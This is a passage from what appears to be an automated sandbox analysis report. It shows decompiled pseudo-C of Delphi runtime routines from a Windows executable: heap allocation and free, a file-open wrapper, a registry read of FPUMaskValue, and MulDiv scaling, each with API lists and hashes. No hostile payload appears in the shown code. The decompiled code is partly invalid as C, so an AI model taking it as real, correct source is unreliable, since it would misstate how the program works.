>> 0xd; 						_t131 = _t141 >> 8; 						_t104 = 0xffffffff << _t131 &  *(0x463728 + _t142 * 4); 						__eflags = 0xffffffff; 						if(0xffffffff == 0) { 							_t132 = _t142; 							__eflags = 0xfffffffe << _t132 &  *0x463724; 							if((0xfffffffe << _t132 &  *0x463724) == 0) { 								_t133 =  *0x463720; // 0x3a290 								_t134 = _t133 - _t125; 								__eflags = _t134; 								if(_t134 < 0) { 									_t109 = E004016C8(_t125); 								} else { 									_t110 =  *0x46371c; // 0x261a2a0 									_t109 = _t110 - _t125; 									 *0x46371c = _t109; 									 *0x463720 = _t134; 									 *(_t109 - 4) = _t125 | 0x00000002; 								} 								 *0x463718 = 0; 								return _t109; 							} else { 								asm("bsf edx, eax"); 								asm("bsf ecx, eax"); 								_t135 = _t132 | _t142 << 0x00000005; 								goto L47; 							} 						} else { 							asm("bsf eax, eax"); 							_t135 = _t131 & 0xffffffe0 | _t104; 							L47: 							_push(_t152); 							_push(_t145); 							_t148 = 0x4637a8 + _t135 * 8; 							_t159 =  *((intOrPtr*)(_t148 + 4)); 							_t114 =  *((intOrPtr*)(_t159 + 4)); 							 *((intOrPtr*)(_t148 + 4)) = _t114; 							 *_t114 = _t148; 							__eflags = _t148 - _t114; 							if(_t148 == _t114) { 								asm("rol eax, cl"); 								_t80 = 0x463728 + _t142 * 4; 								 *_t80 =  *(0x463728 + _t142 * 4) & 0xfffffffe; 								__eflags =  *_t80; 								if( *_t80 == 0) { 									asm("btr [0x463724], edx"); 								} 							} 							_t150 = 0xfffffff0 &  *(_t159 - 4); 							_t144 = 0xfffffff0 - _t125; 							__eflags = 0xfffffff0; 							if(0xfffffff0 == 0) { 								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]); 								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7; 								__eflags =  *_t89; 							} else { 								_t116 = _t125 + _t159; 								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3; 								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0; 								__eflags = 0xfffffff0 - 0xb30; 								if(0xfffffff0 >= 0xb30) { 									E004015FC(_t116, 0xfffffffffffffff3, 
_t144); 								} 							} 							 *(_t159 - 4) = _t125 + 2; 							 *0x463718 = 0; 							return _t159; 						} 					} 				} else { 					__eflags = __cl; 					__eax =  *(__edx + 0x4635c0) & 0x000000ff; 					__ebx = 0x46103c + ( *(__edx + 0x4635c0) & 0x000000ff) * 8; 					if(__eflags != 0) { 						while(1) { 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__eflags == 0) { 								goto L5; 							} 							__ebx = __ebx + 0x20; 							__eflags = __ebx; 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__ebx != 0) { 								__ebx = __ebx + 0x20; 								__eflags = __ebx; 								__eax = 0x100; 								asm("lock cmpxchg [ebx], ah"); 								if(__ebx != 0) { 									__ebx = __ebx - 0x40; 									__eflags = __ebx; 									Sleep(0); 									__eax = 0x100; 									asm("lock cmpxchg [ebx], ah"); 									if(__eflags != 0) { 										Sleep(0xa); 										continue; 									} 								} 							} 							goto L5; 						} 					} 					L5: 					__edx =  *(__ebx + 4); 					__eax =  *(__edx + 8); 					__ecx = 0xfffffff8; 					__eflags = __edx - __ebx; 					if(__edx == __ebx) { 						__edx =  *(__ebx + 0x10); 						__ecx =  *(__ebx + 2) & 0x0000ffff; 						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax; 						__eflags = __eax -  *(__ebx + 0xc); 						if(__eax >  *(__ebx + 0xc)) { 							_push(__esi); 							_push(__edi); 							__eflags =  *0x46304d; 							if(__eflags != 0) { 								while(1) { 									__eax = 0x100; 									asm("lock cmpxchg [0x463718], ah"); 									if(__eflags == 0) { 										goto L20; 									} 									Sleep(0); 									__eax = 0x100; 									asm("lock cmpxchg [0x463718], ah"); 									if(__eflags != 0) { 										Sleep(0xa); 										continue; 									} 									goto L20; 								} 							} 							L20: 							 *(__ebx + 1) =  *(__ebx + 1) &  *0x463724; 							__eflags =  *(__ebx + 1) &  *0x463724; 							if(( *(__ebx + 1) &  *0x463724) == 0) { 								__ecx =  *(__ebx + 0x18) & 0x0000ffff; 								__edi 
=  *0x463720; // 0x3a290 								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff); 								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) { 									__eax =  *(__ebx + 0x1a) & 0x0000ffff; 									__edi = __eax; 									__eax = E004016C8(__eax); 									__esi = __eax; 									__eflags = __eax; 									if(__eax != 0) { 										goto L33; 									} else { 										 *0x463718 = __al; 										 *__ebx = __al; 										_pop(__edi); 										_pop(__esi); 										_pop(__ebx); 										return __eax; 									} 								} else { 									__esi =  *0x46371c; // 0x261a2a0 									__ecx =  *(__ebx + 0x1a) & 0x0000ffff; 									__edx = __ecx + 0xb30; 									__eflags = __edi - __ecx + 0xb30; 									if(__edi >= __ecx + 0xb30) { 										__edi = __ecx; 									} 									__esi = __esi - __edi; 									 *0x463720 =  *0x463720 - __edi; 									 *0x46371c = __esi; 									goto L33; 								} 							} else { 								asm("bsf eax, esi"); 								__esi = __eax * 8; 								__ecx =  *(0x463728 + __eax * 4); 								asm("bsf ecx, ecx"); 								__ecx =  *(0x463728 + __eax * 4) + __eax * 8 * 4; 								__edi = 0x4637a8 + ( *(0x463728 + __eax * 4) + __eax * 8 * 4) * 8; 								__esi =  *(__edi + 4); 								__edx =  *(__esi + 4); 								 *(__edi + 4) = __edx; 								 *__edx = __edi; 								__eflags = __edi - __edx; 								if(__edi == __edx) { 									__edx = 0xfffffffe; 									asm("rol edx, cl"); 									_t38 = 0x463728 + __eax * 4; 									 *_t38 =  *(0x463728 + __eax * 4) & 0xfffffffe; 									__eflags =  *_t38; 									if( *_t38 == 0) { 										asm("btr [0x463724], eax"); 									} 								} 								__edi = 0xfffffff0; 								__edi = 0xfffffff0 &  *(__esi - 4); 								__eflags = 0xfffffff0 - 0x10a60; 								if(0xfffffff0 < 0x10a60) { 									_t52 =  &((__esi - 4)[0xfffffffffffffffc]); 									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7; 									__eflags =  *_t52; 								} else { 									__edx = __edi; 									__edi =  *(__ebx + 0x1a) 
& 0x0000ffff; 									__edx = __edx - __edi; 									__eax = __edi + __esi; 									__ecx = __edx + 3; 									 *(__eax - 4) = __ecx; 									 *(__edx + __eax - 8) = __edx; 									__eax = E004015FC(__eax, __ecx, __edx); 								} 								L33: 								_t56 = __edi + 6; // 0x3a296 								__ecx = _t56; 								 *(__esi - 4) = _t56; 								__eax = 0; 								 *0x463718 = __al; 								 *__esi = __ebx; 								 *((intOrPtr*)(__esi + 8)) = 0; 								 *((intOrPtr*)(__esi + 0xc)) = 1; 								 *(__ebx + 0x10) = __esi; 								_t61 = __esi + 0x20; // 0x261a2c0 								__eax = _t61; 								__ecx =  *(__ebx + 2) & 0x0000ffff; 								__edx = __ecx + __eax; 								 *(__ebx + 8) = __ecx + __eax; 								__edi = __edi + __esi; 								__edi = __edi - __ecx; 								__eflags = __edi; 								 *(__ebx + 0xc) = __edi; 								 *__ebx = 0; 								 *(__eax - 4) = __esi; 								_pop(__edi); 								_pop(__esi); 								_pop(__ebx); 								return __eax; 							} 						} else { 							_t19 = __edx + 0xc; 							 *_t19 =  *(__edx + 0xc) + 1; 							__eflags =  *_t19; 							 *(__ebx + 8) = __ecx; 							 *__ebx = 0; 							 *(__eax - 4) = __edx; 							_pop(__ebx); 							return __eax; 						} 					} else { 						 *(__edx + 0xc) =  *(__edx + 0xc) + 1; 						__ecx = 0xfffffff8 &  *(__eax - 4); 						__eflags = 0xfffffff8; 						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4); 						 *(__eax - 4) = __edx; 						if(0xfffffff8 == 0) { 							__ecx =  *(__edx + 4); 							 *(__ecx + 0x14) = __ebx; 							 *(__ebx + 4) = __ecx; 							 *__ebx = 0; 							_pop(__ebx); 							return __eax; 						} else { 							 *__ebx = 0; 							_pop(__ebx); 							return __eax; 						} 					} 				} 			}                        

                                                                            0x004019f4
                                                                            0x004019f4
                                                                            0x00401988
                                                                            0x00401988
                                                                            0x0040198a
                                                                            0x0040198e
                                                                            0x00401990
                                                                            0x00401993
                                                                            0x00401996
                                                                            0x00401999
                                                                            0x0040199d
                                                                            0x0040199d
                                                                            0x004019f9
                                                                            0x004019f9
                                                                            0x004019f9
                                                                            0x004019fc
                                                                            0x004019ff
                                                                            0x00401a01
                                                                            0x00401a06
                                                                            0x00401a08
                                                                            0x00401a0b
                                                                            0x00401a12
                                                                            0x00401a15
                                                                            0x00401a15
                                                                            0x00401a18
                                                                            0x00401a1c
                                                                            0x00401a1f
                                                                            0x00401a22
                                                                            0x00401a24
                                                                            0x00401a24
                                                                            0x00401a26
                                                                            0x00401a29
                                                                            0x00401a2c
                                                                            0x00401a2f
                                                                            0x00401a30
                                                                            0x00401a31
                                                                            0x00401a32
                                                                            0x00401a32
                                                                            0x0040187e
                                                                            0x0040187e
                                                                            0x0040187e
                                                                            0x0040187e
                                                                            0x00401882
                                                                            0x00401885
                                                                            0x00401888
                                                                            0x0040188b
                                                                            0x0040188c
                                                                            0x0040188c
                                                                            0x00401859
                                                                            0x00401859
                                                                            0x0040185d
                                                                            0x0040185d
                                                                            0x00401860
                                                                            0x00401863
                                                                            0x00401866
                                                                            0x00401890
                                                                            0x00401893
                                                                            0x00401896
                                                                            0x00401899
                                                                            0x0040189c
                                                                            0x0040189d
                                                                            0x00401868
                                                                            0x00401868
                                                                            0x0040186b
                                                                            0x0040186c
                                                                            0x0040186c
                                                                            0x00401866
                                                                            0x00401857

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,004020BD), ref: 004018CC
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,004020BD), ref: 004018E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2
                                                                            • Instruction ID: 152e54be863095814fc9e312b9aeabec1b522ad23c6b77915a881c1f34c1aab1
                                                                            • Opcode Fuzzy Hash: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2
                                                                            • Instruction Fuzzy Hash: 4DB139F26012919FC715CF29D880316BBE0EB85312F18C27FE4459B3E5E7B89A41CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            E0041CB80(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
                                                                                char _v5;
                                                                                char _v12;
                                                                                char _v16;
                                                                                char _v20;
                                                                                char _v24;
                                                                                char _v28;
                                                                                char _v32;
                                                                                char _v36;
                                                                                char _v40;
                                                                                void* _t29;
                                                                                void* _t65;
                                                                                void* _t66;
                                                                                intOrPtr _t70;
                                                                                intOrPtr _t72;
                                                                                char _t73;
                                                                                intOrPtr _t77;
                                                                                void* _t89;
                                                                                void* _t91;
                                                                                void* _t92;
                                                                                intOrPtr _t93;

                                                                                _t73 = __edx;
                                                                                _t66 = __ecx;
                                                                                _t91 = _t92;
                                                                                _t93 = _t92 + 0xffffffdc;
                                                                                _v36 = 0;
                                                                                _v40 = 0;
                                                                                _v28 = 0;
                                                                                _v32 = 0;
                                                                                if(__edx != 0) {
                                                                                    _t93 = _t93 + 0xfffffff0;
                                                                                    _t29 = E00403C34(_t29, _t91);
                                                                                }
                                                                                _t89 = _t66;
                                                                                _v5 = _t73;
                                                                                _t65 = _t29;
                                                                                _t87 = _a8;
                                                                                _push(_t91);
                                                                                _push(0x41ccc8);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t93;
                                                                                if(_a8 != 0xffff) {
                                                                                    E0041CA78(E00408D98(_t89, _t87 & 0x0000ffff), 0);
                                                                                    if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                        E00408F58(_t89,  &_v36);
                                                                                        _v24 = _v36;
                                                                                        _v20 = 0xb;
                                                                                        E0040B908(GetLastError(),  &_v40);
                                                                                        _v16 = _v40;
                                                                                        _v12 = 0xb;
                                                                                        _t70 =  *0x462ac0; // 0x416140
                                                                                        E0040C214(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
                                                                                        E00404184();
                                                                                    }
                                                                                } else {
                                                                                    E0041CA78(CreateFileA(E00404C00(_t89), 0xc0000000, 0, 0, "true", 0x80, 0), 0);
                                                                                    if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                        E00408F58(_t89,  &_v28);
                                                                                        _v24 = _v28;
                                                                                        _v20 = 0xb;
                                                                                        E0040B908(GetLastError(),  &_v32);
                                                                                        _v16 = _v32;
                                                                                        _v12 = 0xb;
                                                                                        _t72 =  *0x462f34; // 0x416138
                                                                                        E0040C214(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
                                                                                        E00404184();
                                                                                    }
                                                                                }
                                                                                _t27 = _t65 + 8; // 0x418ad8
                                                                                E00404790(_t27, _t89);
                                                                                _pop(_t77);
                                                                                *[fs:eax] = _t77;
                                                                                _push(E0041CCCF);
                                                                                return E00404760( &_v40, 4);
                                                                            }


                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CBDC
                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC0A
                                                                              • Part of subcall function 00408D98: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00418AD0,0041CC4A,00000000,0041CCC8,?,?,00418AD0), ref: 00408DE6
                                                                              • Part of subcall function 00408F58: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00418AD0,0041CC65,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 00408F77
                                                                            • GetLastError.KERNEL32(00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC6F
                                                                              • Part of subcall function 0040B908: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000), ref: 0040B927
                                                                            Strings
                                                                            • 8aA , xrefs: 0041CC27
                                                                            • @aA , xrefs: 0041CC8C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                            • String ID: 8aA$@aA
                                                                            • API String ID: 503785936-2183923460
                                                                            • Opcode ID: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb
                                                                            • Instruction ID: 81cf5405ad412fc3c3ed94fa8eb2254e93a3cb41c3525e5490fe9ad35a09f5bb
                                                                            • Opcode Fuzzy Hash: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb
                                                                            • Instruction Fuzzy Hash: 4B31D670A002089FDB00EBA5CD827DEBBF5AB49304F50807EE504B73C1D7799D048BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
                                                                            E00403728() {
                                                                                void* _v8;
                                                                                char _v12;
                                                                                int _v16;
                                                                                signed short _t14;
                                                                                intOrPtr _t27;
                                                                                void* _t29;
                                                                                void* _t31;
                                                                                intOrPtr _t32;

                                                                                _t29 = _t31;
                                                                                _t32 = _t31 + 0xfffffff4;
                                                                                _v12 =  *0x461020 & 0x0000ffff;
                                                                                if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                    _t14 =  *0x461020 & 0xffc0 | _v12 & 0x3f;
                                                                                    *0x461020 = _t14;
                                                                                    return _t14;
                                                                                } else {
                                                                                    _push(_t29);
                                                                                    _push(E00403799);
                                                                                    _push( *[fs:eax]);
                                                                                    *[fs:eax] = _t32;
                                                                                    _v16 = 4;
                                                                                    RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                    _pop(_t27);
                                                                                    *[fs:eax] = _t27;
                                                                                    _push(0x4037a0);
                                                                                    return RegCloseKey(_v8);
                                                                                }
                                                                            }


                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040374A
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040377D
                                                                            • RegCloseKey.ADVAPI32(?,004037A0,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403793
                                                                            Strings
                                                                            • SOFTWARE\Borland\Delphi\RTL , xrefs: 00403740
                                                                            • FPUMaskValue , xrefs: 00403774
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e
                                                                            • Instruction ID: 905e6c10af62dac64c3e9582eb7401ad952ea0fe5c189a7c1f175b7203d1f33b
                                                                            • Opcode Fuzzy Hash: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e
                                                                            • Instruction Fuzzy Hash: C701B5B9914348BAEB11DF918C42BB977BCEB48B01F104477F904F79D0E6789A10C65D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            E0044E9D8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                intOrPtr* _v8;
                                                                                int _t103;
                                                                                int _t105;
                                                                                intOrPtr _t122;
                                                                                int _t127;
                                                                                intOrPtr _t163;
                                                                                signed char _t172;
                                                                                void* _t174;
                                                                                intOrPtr _t192;
                                                                                intOrPtr _t205;
                                                                                void* _t208;
                                                                                void* _t210;
                                                                                int _t211;
                                                                                intOrPtr _t215;
                                                                                void* _t217;
                                                                                signed char _t218;

                                                                                _t208 = __edi;
                                                                                _t175 = __ecx;
                                                                                _t214 = _t215;
                                                                                _push(__ecx);
                                                                                _t210 = __edx;
                                                                                _v8 = __eax;
                                                                                E0043E310(_v8);
                                                                                _push(_t215);
                                                                                _push(0x44ec56);
                                                                                _push( *[fs:edx]);
                                                                                *[fs:edx] = _t215;
                                                                                *(_v8 + 0x2b0) = 0;
                                                                                *(_v8 + 0x2b4) = 0;
                                                                                *(_v8 + 0x2b8) = 0;
                                                                                _t174 = 0;
                                                                                _t217 = E004038B4( *_v8) -  *0x44b604; // 0x44b650
                                                                                if(_t217 == 0) {
                                                                                    _t172 =  *0x4657f5 & 0x000000ff ^ 0x00000001;
                                                                                    _t218 = _t172;
                                                                                    *(_v8 + 0x27c) = _t172;
                                                                                }
                                                                                E0043D938(_v8, _t174, _t175, _t210, _t218);
                                                                                if( *(_v8 + 0x2a4) == 0 ||  *(_v8 + 0x2b8) <= 0) {
                                                                                    L14:
                                                                                    _t103 =  *(_v8 + 0x2b0);
                                                                                    _t227 = _t103;
                                                                                    if(_t103 > 0) {
                                                                                        E0043A3B0(_v8, _t103, _t227);
                                                                                    }
                                                                                    _t105 =  *(_v8 + 0x2b4);
                                                                                    _t228 = _t105;
                                                                                    if(_t105 > 0) {
                                                                                        E0043A3F4(_v8, _t105, _t228);
                                                                                    }
                                                                                    *(_v8 + 0x8c) =  *0x44ec64 & 0x000000ff;
                                                                                    _t229 = _t174;
                                                                                    if(_t174 == 0) {
                                                                                        L0044DFB0(_v8, 1, 1);
                                                                                        L00441EB0(_v8, 1, 1, _t229);
                                                                                    }
                                                                                    E0043BC9C(_v8, 0, 0xb03d, 0);
                                                                                    _pop(_t192);
                                                                                    *[fs:eax] = _t192;
                                                                                    _push(0x44ec5d);
                                                                                    return E0043E318(_v8);
                                                                                } else {
                                                                                    if(( *(_v8 + 0x8c) & 0x00000010) != 0) {
                                                                                        _t205 =  *0x466584; // 0x26e66a0
                                                                                        if( *(_v8 + 0x2a4) !=  *((intOrPtr*)(_t205 + 0x40))) {
                                                                                            _t163 =  *0x466584; // 0x26e66a0
                                                                                            E00425B74( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00425B6C( *((intOrPtr*)(_v8 + 0x68))),  *(_t163 + 0x40),  *(_v8 + 0x2a4)), _t208, _t214);
                                                                                        }
                                                                                    }
                                                                                    _t122 =  *0x466584; // 0x26e66a0
                                                                                    *(_v8 + 0x2a4) =  *(_t122 + 0x40);
                                                                                    _t211 = E0044EDC4(_v8);
                                                                                    _t127 =  *(_v8 + 0x2b8);
                                                                                    _t223 = _t211 - _t127;
                                                                                    if(_t211 != _t127) {
                                                                                        _t174 = 1;
                                                                                        L0044DFB0(_v8, _t127, _t211);
                                                                                        E0043A4D8(_v8,  *(_v8 + 0x2b8), _t211);
                                                                                        L00441EB0(_v8,  *(_v8 + 0x2b8), _t211, _t223);
                                                                                        if(( *(_v8 + 0x8c) & 0x00000004) != 0) {
                                                                                            *(_v8 + 0x2b0) = MulDiv( *(_v8 + 0x2b0), _t211,  *(_v8 + 0x2b8));
                                                                                        }
                                                                                        if(( *(_v8 + 0x8c) & 0x00000008) != 0) {
                                                                                            *(_v8 + 0x2b4) = MulDiv( *(_v8 + 0x2b4), _t211,  *(_v8 + 0x2b8));
                                                                                        }
                                                                                        if(( *(_v8 + 0x8c) & 0x00000020) != 0) {
                                                                                            *(_v8 + 0x242) = MulDiv( *(_v8 + 0x242), _t211,  *(_v8 + 0x2b8));
                                                                                            *(_v8 + 0x246) = MulDiv( *(_v8 + 0x246), _t211,  *(_v8 + 0x2b8));
                                                                                        }
                                                                                    }
                                                                                    goto L14;
                                                                                }
                                                                            }

                                                                            0x0044ea88
                                                                            0x0044ea94
                                                                            0x0044eab4
                                                                            0x0044eab4
                                                                            0x0044ea88
                                                                            0x0044eab9
                                                                            0x0044eac4
                                                                            0x0044ead2
                                                                            0x0044ead7
                                                                            0x0044eadd
                                                                            0x0044eadf
                                                                            0x0044eae5
                                                                            0x0044eaee
                                                                            0x0044eb01
                                                                            0x0044eb14
                                                                            0x0044eb23
                                                                            0x0044eb42
                                                                            0x0044eb42
                                                                            0x0044eb52
                                                                            0x0044eb71
                                                                            0x0044eb71
                                                                            0x0044eb81
                                                                            0x0044eba0
                                                                            0x0044ebc3
                                                                            0x0044ebc3
                                                                            0x0044eb81
                                                                            0x00000000
                                                                            0x0044eadf

                                                                            APIs
                                                                            • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044EAAB
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB3A
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB69
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB98
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EBBB
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84
                                                                            • Instruction ID: 21f30903740b1ce47e0213c7038e8d86d6add3c7edb827e050f75d84db499a4c
                                                                            • Opcode Fuzzy Hash: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84
                                                                            • Instruction Fuzzy Hash: 7081B574A00154EFDB40DB9AC589E9EB7F9BF49304F2541FAA808DB362CB74AE409B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
E00401B88(void* __eax, void* __edi) {
	signed int __ebx;
	void* _t50;
	signed int _t51;
	signed int _t52;
	signed int _t54;
	void _t57;
	int _t58;
	signed int _t65;
	void* _t67;
	signed int _t69;
	intOrPtr _t70;
	signed int _t75;
	signed int _t76;
	signed int _t77;
	void* _t79;
	void* _t82;
	void _t85;
	void* _t87;
	void* _t89;

	_t48 = __eax;
	_t77 = *(__eax - 4);
	_t65 = *0x46304d; // 0x0
	if((_t77 & 0x00000007) != 0) {
		__eflags = _t77 & 0x00000005;
		if((_t77 & 0x00000005) != 0) {
			_pop(_t65);
			__eflags = _t77 & 0x00000003;
			if((_t77 & 0x00000003) != 0) {
				return 0xffffffff;
			} else {
				_push(_t65);
				_t67 = __eax - 0x10;
				E00401740();
				_t50 = _t67;
				_t85 = *_t50;
				_t82 = *(_t50 + 4);
				_t51 = VirtualFree(_t67, 0, 0x8000);
				if(_t51 == 0) {
					_t52 = _t51 | 0xffffffff;
					__eflags = _t52;
				} else {
					*_t82 = _t85;
					*(_t85 + 4) = _t82;
					_t52 = 0;
				}
				*0x4657a8 = 0;
				return _t52;
			}
		} else {
			goto L21;
		}
	} else {
		__eflags = __bl;
		__ebx = *__edx;
		if(__eflags != 0) {
			while(1) {
				__eax = 0x100;
				asm("lock cmpxchg [ebx], ah");
				if(__eflags == 0) {
					goto L6;
				}
				Sleep(0);
				__edx = __edx;
				__ecx = __ecx;
				__eax = 0x100;
				asm("lock cmpxchg [ebx], ah");
				if(__eflags != 0) {
					Sleep(0xa);
					__edx = __edx;
					__ecx = __ecx;
					continue;
				}
				goto L6;
			}
		}
		L6:
		_t6 = __edx + 0xc;
		*_t6 = *(__edx + 0xc) - 1;
		__eflags = *_t6;
		__eax = *(__edx + 8);
		if(*_t6 == 0) {
			__eflags = __eax;
			if(__eax == 0) {
				L12:
				*(__ebx + 0xc) = __eax;
			} else {
				__eax = *(__edx + 0x14);
				__ecx = *(__edx + 4);
				*(__eax + 4) = __ecx;
				*(__ecx + 0x14) = __eax;
				__eax = 0;
				__eflags = *((intOrPtr*)(__ebx + 0x10)) - __edx;
				if(*((intOrPtr*)(__ebx + 0x10)) == __edx) {
					goto L12;
				}
			}
			*__ebx = __al;
			__eax = __edx;
			__edx = *(__edx - 4);
			__bl = *0x46304d; // 0x0
			L21:
			__eflags = _t65;
			_t69 = _t77 & 0xfffffff0;
			_push(_t84);
			_t87 = _t48;
			if(__eflags != 0) {
				while(1) {
					_t54 = 0x100;
					asm("lock cmpxchg [0x463718], ah");
					if(__eflags == 0) {
						goto L22;
					}
					Sleep(0);
					_t54 = 0x100;
					asm("lock cmpxchg [0x463718], ah");
					if(__eflags != 0) {
						Sleep(0xa);
						continue;
					}
					goto L22;
				}
			}
			L22:
			__eflags = (_t87 - 4)[_t69] & 0x00000001;
			_t75 = (_t87 - 4)[_t69];
			if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
				_t54 = _t69 + _t87;
				_t76 = _t75 & 0xfffffff0;
				_t69 = _t69 + _t76;
				__eflags = _t76 - 0xb30;
				if(_t76 >= 0xb30) {
					_t54 = E004015BC(_t54);
				}
			} else {
				_t76 = _t75 | 0x00000008;
				__eflags = _t76;
				(_t87 - 4)[_t69] = _t76;
			}
			__eflags = *(_t87 - 4) & 0x00000008;
			if((*(_t87 - 4) & 0x00000008) != 0) {
				_t76 = *(_t87 - 8);
				_t87 = _t87 - _t76;
				_t69 = _t69 + _t76;
				__eflags = _t76 - 0xb30;
				if(_t76 >= 0xb30) {
					_t54 = E004015BC(_t87);
				}
			}
			__eflags = _t69 - 0x13fff0;
			if(_t69 == 0x13fff0) {
				__eflags = *0x463720 - 0x13fff0;
				if(*0x463720 != 0x13fff0) {
					_t70 = _t87 + 0x13fff0;
					E0040165C(_t54);
					*((intOrPtr*)(_t70 - 4)) = 2;
					*0x463720 = 0x13fff0;
					*0x46371c = _t70;
					*0x463718 = 0;
					__eflags = 0;
					return 0;
				} else {
					_t89 = _t87 - 0x10;
					_t57 = *_t89;
					_t79 = *(_t89 + 4);
					*(_t57 + 4) = _t79;
					*_t79 = _t57;
